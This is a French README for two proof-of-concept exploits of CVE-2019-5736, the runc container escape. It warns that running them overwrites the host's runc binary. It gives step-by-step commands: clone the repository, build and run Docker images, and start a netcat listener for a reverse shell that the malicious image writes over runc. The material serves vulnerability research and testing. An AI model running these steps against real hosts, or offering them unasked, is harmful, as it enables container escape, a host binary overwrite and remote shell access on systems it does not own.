
PoC CVE-2019-5736
Deux PoC pour CVE-2019-5736. Voir Twistlock Labs pour une explication de CVE-2019-5736 et des PoC.
Le PoC d’image malveillante est fortement basé sur le PoC de q3k, tout le crédit lui revient donc.
Notez que l’exécution des PoC écrasera le binaire runc sur l’hôte. Il est recommandé de créer une copie de votre binaire runc (généralement dans /usr/sbin/runc) avant d’exécuter l’un des PoC.
Clonez le dépôt :
$ git clone https://github.com/twistlock/RunC-CVE-2019-5736
Écrase runc avec un simple programme qui affiche une chaîne.
Exécution du PoC exec :
$ cd RunC-CVE-2019-5736
$ docker build -t cve-2019-5736:exec_POC ./exec_POC
$ docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
$ docker exec poc_ctr bash
Écrase runc avec un simple script bash de reverse shell qui se connecte à localhost:2345.
Écoutez le reverse shell :
$ nc -nvlp 2345
Depuis un autre shell, exécutez le PoC d’image malveillante :
$ cd RunC-CVE-2019-5736
$ docker build -t cve-2019-5736:malicious_image_POC ./malicious_image_POC
$ docker run --rm cve-2019-5736:malicious_image_POC